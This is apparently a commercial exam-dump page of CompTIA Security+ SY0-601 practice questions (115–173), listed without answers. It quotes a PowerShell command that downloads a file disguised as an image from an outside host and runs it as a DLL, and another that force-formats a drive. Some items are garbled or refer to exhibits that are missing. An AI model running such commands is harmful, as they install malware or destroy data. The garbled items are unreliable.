C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Buy Now
Questions 115

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Buy Now
Questions 116

A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

Options:

A.

Soft token

B.

Smart card

C.

CSR

D.

SSH key

Buy Now
Questions 117

During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Buy Now
Questions 118

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Buy Now
Questions 119

A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night. Which of the following would use the least amount of storage space for backups?

Options:

A.

A weekly, incremental backup with daily differential backups

B.

A weekly, full backup with daily snapshot backups

C.

A weekly, full backup with daily differential backups

D.

A weekly, full backup with daily incremental backups

Buy Now
Questions 120

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Buy Now
Questions 121

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

Options:

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are used

Buy Now
Questions 122

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Buy Now
Questions 123

Security analysts notice a server login from a user who has been on vacation for two weeks, The an-alysts confirm that the user did not log in to the system while on vacation After reviewing packet capture the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was con-promised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Buy Now
Questions 124

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

Disgruntled employee

Buy Now
Questions 125

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office?

Options:

A.

Always-on

B.

Remote access

C.

Site-to-site

D.

Full tunnel

Buy Now
Questions 126

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Buy Now
Questions 127

Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases?

Options:

A.

Privacy

B.

Availability

C.

Integrity

D.

Confidentiality

Buy Now
Questions 128

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 129

A security analyst is looking for a solution to help communicate to the leadership team the seventy levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Buy Now
Questions 130

Two organizations are discussing a possible merger Both Organizations Chief Fi-nancial Officers would like to safely share payroll data with each Other to de-termine if the pay scales for different roles are similar at both organizations Which Of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

Options:

A.

Pseudo-anonymization

B.

Tokenization

C.

Data masking

D.

Encryption

Buy Now
Questions 131

Which Of the following will provide the best physical security countermeasures to Stop intruders? (Select two).

Options:

A.

Alarm

B.

Signage

C.

Lighting

D.

Access control vestibules

E.

Fencing

F.

Sensors

Buy Now
Questions 132

An organization is building a new headquarters and has placed fake cameras around the building in an attempt to discourage potential intruders. Which of the following kinds of controls describes this security method?

Options:

A.

Detective

B.

Deterrent

C.

Directive

D.

Corrective

Buy Now
Questions 133

A dynamic application vulnerability scan identified code injection could be performed using a web form. Which of the following will be BEST remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy MFA

C.

Utilize a WAF

D.

Configure HIPS

Buy Now
Questions 134

A Chief Information Security Officer (CISO) is evaluating (he dangers involved in deploying a new ERP system tor the company. The CISO categorizes the system, selects the controls mat apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system Which of the following is the CISO using to evaluate Hie environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framevtoik

D.

ISO 27002

Buy Now
Questions 135

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Buy Now
Questions 136

A security assessment found that several embedded systems are running unsecure protocols. These Systems were purchased two years ago and the company that developed them is no longer in business Which of the following constraints BEST describes the reason the findings cannot be remediated?

Options:

A.

inability to authenticate

B.

Implied trust

C.

Lack of computing power

D.

Unavailable patch

Buy Now
Questions 137

Remote workers in an organization use company-provided laptops with locally installed applications and locally stored data Users can store data on a remote server using an encrypted connection. The organization discovered data stored on a laptop had been made available to the public Which of the following security solutions would mitigate the risk of future data disclosures?

Options:

A.

FDE

B.

TPM

C.

HIDS

D.

VPN

Buy Now
Questions 138

A security researcher is tracking an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

The Cyber Kill Chain

C.

The MITRE CVE database

D.

The incident response process

Buy Now
Questions 139

Which of the following BEST describes a social-engineering attack that relies on an executive at a small business visiting a fake banking website where credit card and account details are harvested?

Options:

A.

Whaling

B.

Spam

C.

Invoice scam

D.

Pharming

Buy Now
Questions 140

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the day.

• Endpoint protection was disabled on several workstations throughout the network.

• Travel times on logins from the affected users are impossible.

• Sensitive data is being uploaded to external sites.

• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

Options:

A.

Brute-force

B.

Keylogger

C.

Dictionary

D.

Rainbow

Buy Now
Questions 141

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the BEST solution to prevent this type of incident from occurring again?

Options:

A.

Enforce the use of a controlled trusted source of container images

B.

Deploy an IPS solution capable of detecting signatures of attacks targeting containers

C.

Define a vulnerability scan to assess container images before being introduced on the environment

D.

Create a dedicated VPC for the containerized environment

Buy Now
Questions 142

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Buy Now
Questions 143

An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:

•Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.

•Internal users in question were changing their passwords frequently during that time period.

•A jump box that several domain administrator users use to connect to remote devices was recently compromised.

•The authentication method used in the environment is NTLM.

Which of the following types of attacks is MOST likely being used to gain unauthorized access?

Options:

A.

Pass-the-hash

B.

Brute-force

C.

Directory traversal

D.

Replay

Buy Now
Questions 144

Which of the following environments would MOST likely be used to assess the execution of component parts of a system at both the hardware and software levels and to measure performance characteristics?

Options:

A.

Test

B.

Staging

C.

Development

D.

Production

Buy Now
Questions 145

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned tf servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

Options:

A.

135

B.

139

C.

143

D.

161

E.

443

F.

445

Buy Now
Questions 146

During an incident a company CIRT determine it is necessary to observe the continued network-based transaction between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physical move the PC to a separate internet pint of presence

B.

Create and apply micro segmentation rules.

C.

Emulate the malware in a heavily monitored DM Z segment.

D.

Apply network blacklisting rules for the adversary domain

Buy Now
Questions 147

An organization recently acquired an ISO 27001 certification. Which of the following would MOST likely be considered a benefit of this certification?

Options:

A.

It allows for the sharing of digital forensics data across organizations

B.

It provides insurance in case of a data breach

C.

It provides complimentary training and certification resources to IT security staff.

D.

It certifies the organization can work with foreign entities that require a security clearance

E.

It assures customers that the organization meets security standards

Buy Now
Questions 148

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

Options:

A.

Enable the remote-wiping option in the MDM software in case the phone is stolen.

B.

Configure the MDM software to enforce the use of PINs to access the phone.

C.

Configure MDM for FDE without enabling the lock screen.

D.

Perform a factory reset on the phone before installing the company's applications.

Buy Now
Questions 149

A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks. Which of the following will this practice reduce?

Options:

A.

Dumpster diving

B.

Shoulder surfing

C.

Information elicitation

D.

Credential harvesting

Buy Now
Questions 150

A security analyst reviews a company’s authentication logs and notices multiple authentication failures. The authentication failures are from different usernames that share the same source IP address. Which of the password attacks is MOST likely happening?

Options:

A.

Dictionary

B.

Rainbow table

C.

Spraying

D.

Brute-force

Buy Now
Questions 151

A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. Which of the following control types does this BEST represent?

Options:

A.

Preventive

B.

Compensating

C.

Corrective

D.

Detective

Buy Now
Questions 152

An analyst Is generating a security report for the management team. Security guidelines recommend disabling all listening unencrypted services. Given this output from Nmap:

Which of the following should the analyst recommend to disable?

Options:

A.

21/tcp

B.

22/tcp

C.

23/tcp

D.

443/tcp

Buy Now
Questions 153

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Buy Now
Questions 154

A user attempts to load a web-based application, but the expected login screen does not appear A help desk analyst troubleshoots the issue by running the following command and reviewing the output on the user's PC

The help desk analyst then runs the same command on the local PC

Which of the following BEST describes the attack that is being detected?

Options:

A.

Domain hijacking

B DNS poisoning

C MAC flooding

B.

Evil twin

Buy Now
Questions 155

A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned In the email. This BEST describes a scenario related to:

Options:

A.

whaling.

B.

smishing.

C.

spear phishing

D.

vishing

Buy Now
Questions 156

The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate on incident response and to outsource outbound Internet URL categorization and filtering to an outside company. Additionally, the CISO would like this solution to provide the same protections even when a company laptop or mobile device is away from a home office. Which of the following should the CISO choose?

Options:

A.

CASB

B.

Next-generation SWG

C.

NGFW

D.

Web-application firewall

Buy Now
Questions 157

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

Options:

A.

Authentication protocol

B.

Encryption type

C.

WAP placement

D.

VPN configuration

Buy Now
Questions 158

A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A sales director recently had a

laptop stolen, and later, enterprise data was found to have been compromised from a local database. Which of the following was the

MOST likely cause?

Options:

A.

Shadow IT

B.

Credential stuffing

C.

SQL injection

D.

Man in the browser

E.

Bluejacking

Buy Now
Questions 159

A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

Options:

A.

Non-credentialed

B.

Web application

C.

Privileged

D.

Internal

Buy Now
Questions 160

The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

Options:

A.

SAML

B.

TACACS+

C.

Password vaults

D.

OAuth

Buy Now
Questions 161

A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business

partner connection to a vendor, who is not held to the same security contral standards. Which of the following is the MOST likely source of the breach?

Options:

A.

Side channel

B.

Supply chain

C.

Cryptographic downgrade

D.

Malware

Buy Now
Questions 162

A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as follows:

* Ensure mobile devices can be tracked and wiped.

* Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

Options:

A.

A Geofencing

B.

Biometric authentication

C.

Geolocation

D.

Geotagging

Buy Now
Questions 163

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Buy Now
Questions 164

Which of the following biometric authentication methods is the MOST accurate?

Options:

A.

Gait

B.

Retina

C.

Signature

D.

Voice

Buy Now
Questions 165

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Buy Now
Questions 166

Which of the following should a technician consider when selecting an encryption method for data that needs to remain confidential for a specific length of time?

Options:

A.

The key length of the encryption algorithm

B.

The encryption algorithm's longevity

C.

A method of introducing entropy into key calculations

D.

The computational overhead of calculating the encryption key

Buy Now
Questions 167

A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

Options:

A.

A RAT

B.

Ransomware

C.

Polymophic

D.

A worm

Buy Now
Questions 168

You received the output of a recent vulnerability assessment.

Review the assessment and scan output and determine the appropriate remedialion(s} 'or «ach dewce.

Remediation options may be selected multiple times, and some devices may require more than one remediation.

If at any time you would like to biing bade the initial state ot the simulation, please dick me Reset All button.

Options:

Buy Now
Questions 169

A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production?

Options:

A.

Disable unneeded services.

B.

Install the latest security patches.

C.

Run a vulnerability scan.

D.

Encrypt all disks.

Buy Now
Questions 170

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

Options:

A.

A DMZ

B.

A VPN a

C.

A VLAN

D.

An ACL

Buy Now
Questions 171

Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

Options:

A.

Unsecure protocols

B.

Use of penetration-testing utilities

C.

Weak passwords

D.

Included third-party libraries

E.

Vendors/supply chain

F.

Outdated anti-malware software

Buy Now
Questions 172

A company reduced the area utilized in its datacenter by creating virtual networking through automation and by creating provisioning routes and rules through scripting. Which of the following does this example describe?

Options:

A.

laC

B.

MSSP

C.

Containers

D.

SaaS

Buy Now
Questions 173

A company has discovered unauthorized devices are using its WiFi network, and it wants to harden the access point to improve security. Which f the following configuration should an analysis enable

To improve security? (Select TWO.)

Options:

A.

RADIUS

B.

PEAP

C.

WPS

D.

WEP-EKIP

E.

SSL

F.

WPA2-PSK

Buy Now
Exam Code: SY0-601
Exam Name: CompTIA Security+ Exam 2021
Last Update: Sep 21, 2023
Questions: 577
SY0-601 pdf

SY0-601 PDF

$32  $80
SY0-601 Engine

SY0-601 Testing Engine

$38  $95
SY0-601 PDF + Engine

SY0-601 PDF + Testing Engine

$52  $130